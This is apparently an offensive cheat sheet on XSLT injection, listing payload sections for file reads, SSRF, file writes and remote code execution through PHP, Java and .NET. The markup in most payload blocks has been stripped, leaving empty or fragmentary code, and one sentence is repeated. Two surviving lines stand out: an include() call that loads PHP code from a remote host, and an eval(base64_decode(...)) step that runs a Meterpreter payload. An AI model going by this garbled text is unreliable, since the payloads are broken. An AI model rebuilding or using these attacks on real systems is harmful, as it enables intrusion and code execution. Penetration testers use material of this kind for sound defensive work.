# XSLT Injection
> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
## Summary
- [XSLT Injection](#xslt-injection)
- [Summary](#summary)
- [Tools](#tools)
- [Exploit](#exploit)
- [Determine the vendor and version](#determine-the-vendor-and-version)
- [External Entity](#external-entity)
- [Read files and SSRF using document](#read-files-and-ssrf-using-document)
- [Write files with EXSLT extension](#write-files-with-exslt-extension)
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
- [Remote Code Execution with Java](#remote-code-execution-with-java)
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
- [References](#references)
## Tools
## Exploit
### Determine the vendor and version
```xml
```
```xml
Version:
Vendor:
Vendor URL:
```
### External Entity
```xml
]>
Fruits &ext_file;:
- :
```
### Read files and SSRF using document
```xml
Fruits:
- :
```
### Write files with EXSLT extension
EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
```xml
Hello World!
```
### Remote Code Execution with PHP wrapper
Execute the function `readfile`.
```xml
```
Execute the function `scandir`.
```xml
```
Execute a remote php file using `assert`
```xml
include("http://10.10.10.10/test.php")
```
Execute a PHP meterpreter using PHP wrapper.
```xml
eval(base64_decode('Base64-encoded Meterpreter code'))
```
Execute a remote php file using `file_put_contents`
```xml
```
### Remote Code Execution with Java
```xml
```
```xml
.
```
### Remote Code Execution with Native .NET
```xml
```
```xml
--- BEGIN COMMAND OUTPUT ---
--- END COMMAND OUTPUT ---
```
## References
* [From XSLT code execution to Meterpreter shells - @agarri - 02 July 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
* [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
* [XSLT injection lead to file creation - PT SWARM - 30 may 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)